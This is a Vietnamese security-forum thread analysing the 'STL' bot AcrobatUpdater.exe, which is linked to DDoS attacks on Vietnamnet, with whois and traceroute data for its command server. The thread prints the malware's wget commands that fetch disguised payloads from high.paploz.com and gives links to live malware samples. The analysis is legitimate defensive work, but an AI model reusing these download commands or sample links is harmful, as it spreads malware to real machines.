1. Tại sao có mấy file mạo danh của stl không có đuôi .exe, tui không double click vô thì làm sao nhiểm virus vô máy tui được ?
2. Nhiều file như StaticCaches.dat, uxtheme.manifest... là các DLL. Các DLL này làm sao tự run được ?
3. Nó download bmp về thì làm sao sinh ra bot mới được ?

 

Found 2 domains hosted on the same web server as high.paploz.com (46.166.147.48).

high.paploz.com (linkback)

second.dinest.net (linkback)
 

high.paploz.com
high.paploz.com Is Hosted by Santrex RU VPS Services

Hosting: Santrex RU VPS Services host the domain high.paploz.com
IP Address: 46.166.147.48

Visit Santrex RU VPS Services now
 

Visit AboutUs.org for more information about paploz.com
AboutUs: paploz.com


Domain name: paploz.com

Registrant Contact:
Whois Privacy Protection Service, Inc.
Whois Agent ()

Fax:
PMB 368, 14150 NE 20th St - F1
C/O paploz.com
Bellevue, WA 98007
US

Administrative Contact:
Whois Privacy Protection Service, Inc.
Whois Agent (yvrpwlywpp@whoisprivacyprotect.com)
+1.4252740657
Fax: +1.4259744730
PMB 368, 14150 NE 20th St - F1
C/O paploz.com
Bellevue, WA 98007
US

Technical Contact:
Whois Privacy Protection Service, Inc.
Whois Agent (yvrpwlywpp@whoisprivacyprotect.com)
+1.4252740657
Fax: +1.4259744730
PMB 368, 14150 NE 20th St - F1
C/O paploz.com
Bellevue, WA 98007
US

Status: Locked

Name Servers:
ns1.afraid.org
ns2.afraid.org
ns3.afraid.org
ns4.afraid.org

Creation date: 01 Aug 2011 08:59:00
Expiration date: 01 Aug 2012 00:59:00


Get Noticed on the Internet! Increase visibility for this domain name by listing it at www.whoisbusinesslistings.com
=-=-=-=
The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about or
related to a domain name registration record. We make this information
available "as is," and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data to: (1)
enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or (2) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic
mail, or by telephone. The compilation, repackaging, dissemination or
other use of this data is expressly prohibited without prior written
consent from us.

We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002

Registrar: ENOM, INC.
Whois Server: whois.enom.com
Creation Date: 01-AUG-2011
Updated Date: 01-AUG-2011
Expiration Date: 01-AUG-2012

Nameserver: NS1.AFRAID.ORG
Nameserver: NS2.AFRAID.ORG
Nameserver: NS3.AFRAID.ORG
Nameserver: NS4.AFRAID.ORG
 

Host trace to
high.paploz.com
22 hops / 47.4 seconds


1. dreamhost.com
United States 2. dreamhost.com
United States 3. ntt.net
United States 4. ntt.net
United States 5. ntt.net
United States 6. ntt.net
United States 7. ntt.net
United States 8. ntt.net
United States 9. ntt.net
Germany 10. ntt.net
Belgium 11. edpnet.net
Belgium 12. edpnet.net
Belgium 13. edpnet.net
Belgium 14. edpnet.net
Belgium 15. edpnet.net
Russian Federation 16. westcall.ru
Russian Federation 17. 82.199.119.33
Russian Federation 18. 82.199.119.146
Russian Federation 19. cod-rt1.tel.ru
Russian Federation 20. iqhost.ru
France 21. santrex.net
22. 46.166.147.48
 

Quay lai trường hợp cụ thể của STL virus AcrobatUpdater.exe thì:

- Khi cài vào XP với quyền Admin 1 hoăc Admin 2 (Admin1 có khác Admin2 đấy nhé) thì AcrobatUpdater.exe được cài vào thư muc C/Program files/, như anh conmale đã viết.

- Khi cài vào XP với quyền Limited thì nó tự đông được cài vào một thư muc khác: thư muc của chính user ấy trong C/Documents and settings/ và vẫn tao ra registry, đủ để active. Xin minh hoạ bằng hình cụ thể (các bạn xem cho sướng con mắt mình. Hì hì)
 

Từ từ mình sẽ post sau, mẫu của stl thì nhiều lắm, phân tích hoạt động của chỉ 1 file thôi đã mấy chục tấm hình rồi.

Bà con thân mến, sau khi second.dinest.com die, giờ stl lại nhảy qua Nhật, thuê webserver bên đó để đặt xc.jpg và xv.jpg:
Code:

wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"

Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này.
top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều.

File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket.

File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i
File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83
 

Có: Chép vào %Program Files% hay %WinDir%, ghi vào HKLM.
Không: Chép vào %AppData% của user, ghi vào HKCU.  

Các bạn HVA nhiệt tình quá, kiểu này thì STL phải thâm hụt ngân quỹ nặng
Có ai làm cái tổng kết xem STL đã tốn bao nhiêu tiền để mua domain mới kể từ khi bị phanh phui không nhỉ. 

@TQN: Liệu trong những virus của STL có sử dụng những kĩ thuật nâng quyền, ring0 Access, ... không anh ? Hay nói cách khác là virus của STL can thiệp đến mức độ nào vào hệ thống rùi ạ ?

Không có sài chùa đâu bạn )
Nếu như theo dõi các reply của mọi người, chắc hẳn ai cũng nhận ra STL là 1 tổ chức lớn và không đơn giản, có được hỗ trợ lớn về nhiều mặt. Vậy tại sao phải dùng CC chùa ? Mà đã là "tổ chức lớn" thì ai lại động đến CC chùa nhỉ ? 

Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh !

[/b][/color]
 

Nó không mới đâu anh PXM. Vẫn là AcrobatUpdater.exe cũ, được down về từ http://penop.net/images01.gif. Code của con này vẫn vậy, chỉ khác các con AcrobatUpdater.exe cũ ở chổ fix một số bug, cải tiến một số hàm, còn lại cơ bản vẫn không đổi, không thêm thêm được 1 hàm nào cả. Em đã upload nó lên 1 loạt AVs rồi, chờ update thôi anh !

Vấn đề quan trọng bây giờ là tìm ra mẫu đang ddos Vietnamnet, tìm ra cái C&C webserver giấu mặt này của bọn stl.

Các bạn đừng sợ, ngại ngùng gì cả, các bạn chỉ tìm mẫu, up mẫu thì mắc mớ cái gì phải sợ, sợ stl, sợ pháp luật à ? Pháp luật nào cấm các bạn tham gia HVA forum, cấm tham gia thảo luận, RCE virus, cấm tìm và up mẫu virus ?????

Tôi nói vậy vì có nhiều bạn PM, mail cho tui để gởi mẫu, nhưng lại sợ tôi nói ra nick HVA, mail address của các bạn. Dĩ nhiên là tôi sẽ làm theo yêu cầu của các bạn. Nhưng tôi lại ngạc nhiên, sao lại phải sợ, tôi, anh PXMMRF, accourics.... và nhiều anh em HVA trong nước không sợ thì tại sao các bạn lại sợ ????????

2 .lht.: Trò mèo của stl chỉ ở mức user mode, code = C/C++ & VB, hoạt động bình thường ở mức user mode như các app bình thường khác. Coder của stl chưa dùng 1 kỹ thuật pure ASM tiên tiến nào mà giới virus writer thế giới đang dùng, và cũng chưa đụng tới kernel driver. Khi nào tụi nó đụng tới rootkit tui sẽ post phân tích. Đang luyện lại SoftIce và WinDbg để chuẩn bị debug rootkit của mấy anh stl, bỏ lâu lụt nghề rồi. 

2 vndncn: Google: submit malware sample

Trước mắt, các bạn chịu khó search trên máy các bạn, nếu có tìm thấy file: GoogleCrashHandler.exe, vui lòng upload lên đâu đó giùm anh em kỹ thuật của HVA. Cảm ơn nhiều ! 

Cảm ơn sacroyant: file cậu úp là file GoogleCrashHandler.pf, tức file prefetch cache của GoogleCrashHandler.exe. Phải là đuôi .exe nhé !